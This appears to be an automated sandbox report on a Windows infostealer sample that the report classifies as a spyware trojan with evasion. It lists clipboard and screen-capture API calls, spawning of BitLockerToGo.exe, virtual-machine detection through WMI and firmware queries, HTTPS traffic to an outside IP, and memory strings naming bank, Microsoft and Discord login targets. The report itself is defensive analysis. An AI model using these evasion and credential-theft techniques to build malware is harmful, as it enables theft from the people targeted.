                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49722 version: TLS 1.2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00432D70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00432D70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_00432FE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004210604_2_00421060
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004388604_2_00438860
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004260004_2_00426000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004193624_2_00419362
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043FB804_2_0043FB80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043BCE04_2_0043BCE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004384F04_2_004384F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004404804_2_00440480
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00418DF14_2_00418DF1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040AD904_2_0040AD90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004095A04_2_004095A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004086404_2_00408640
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040D6F84_2_0040D6F8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042BE8A4_2_0042BE8A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004290404_2_00429040
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004380404_2_00438040
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042A0504_2_0042A050
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004258504_2_00425850
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004328004_2_00432800
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004198204_2_00419820
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F0CB4_2_0043F0CB
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004038D04_2_004038D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004058E04_2_004058E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004308E04_2_004308E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004088F04_2_004088F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040D0FF4_2_0040D0FF
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004158824_2_00415882
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A8A04_2_0040A8A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004390A04_2_004390A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004091404_2_00409140
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041D9404_2_0041D940
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004161484_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004061604_2_00406160
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004339604_2_00433960
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042F1664_2_0042F166
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004159664_2_00415966
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004249744_2_00424974
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004401304_2_00440130
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004229CD4_2_004229CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004111E94_2_004111E9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043C1B04_2_0043C1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F1B04_2_0043F1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00427A5A4_2_00427A5A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041D2604_2_0041D260
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00423A604_2_00423A60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042C26C4_2_0042C26C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042CA354_2_0042CA35
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042CAF14_2_0042CAF1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F2F64_2_0043F2F6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004042804_2_00404280
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042C2824_2_0042C282
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043EA804_2_0043EA80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004263404_2_00426340
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042CB4C4_2_0042CB4C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004263604_2_00426360
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041AB004_2_0041AB00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004373004_2_00437300
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00427B084_2_00427B08
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00432B104_2_00432B10
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F3304_2_0043F330
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00404BC04_2_00404BC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004073C04_2_004073C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F3C04_2_0043F3C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041C3CC4_2_0041C3CC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004393D04_2_004393D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00423BE04_2_00423BE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040EB804_2_0040EB80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042238D4_2_0042238D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F4504_2_0043F450
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00439C704_2_00439C70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042847D4_2_0042847D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00421C804_2_00421C80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041DC904_2_0041DC90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004274A54_2_004274A5
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00427CB04_2_00427CB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004365544_2_00436554
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00432D704_2_00432D70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040ED754_2_0040ED75
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043150E4_2_0043150E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043C5104_2_0043C510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041D5304_2_0041D530
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00414DC04_2_00414DC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00437DE04_2_00437DE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004065F04_2_004065F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042FDF94_2_0042FDF9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405DA04_2_00405DA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00436DB24_2_00436DB2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041FE7C4_2_0041FE7C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043FE204_2_0043FE20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00402ED04_2_00402ED0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040C6F04_2_0040C6F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041DE904_2_0041DE90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004187404_2_00418740
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00428F6C4_2_00428F6C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004147774_2_00414777
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004237D04_2_004237D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417FE14_2_00417FE1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0041EFE04_2_0041EFE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00416F8D4_2_00416F8D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0042F7BC4_2_0042F7BC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00407EE0 appears 45 times
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00414110 appears 82 times
                Source: NjFiIQNSid.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@11/2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_00438860
                Source: NjFiIQNSid.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BitLockerToGo.exe, 00000004.00000003.2775767646.000000000545B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2788727509.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2788449136.0000000005462000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775632875.0000000005477000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NjFiIQNSid.exeVirustotal: Detection: 45%
                Source: NjFiIQNSid.exeReversingLabs: Detection: 36%
                Source: NjFiIQNSid.exeString found in binary or memory: net/addrselect.go
                Source: NjFiIQNSid.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
                Source: unknownProcess created: C:\Users\user\Desktop\NjFiIQNSid.exe "C:\Users\user\Desktop\NjFiIQNSid.exe"
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: NjFiIQNSid.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: NjFiIQNSid.exeStatic file information: File size 6870528 > 1048576
                Source: NjFiIQNSid.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2e8200
                Source: NjFiIQNSid.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x310400
                Source: NjFiIQNSid.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: NjFiIQNSid.exeStatic PE information: section name: .symtab
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h4_2_0043F005
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00445408 push ebp; ret 4_2_00445409
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0044866F pushfd ; retf 4_2_00448677
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5992Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2787866105.00000000054F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696508427p
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859195015.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847665671.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: NjFiIQNSid.exe, 00000000.00000002.2738368198.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
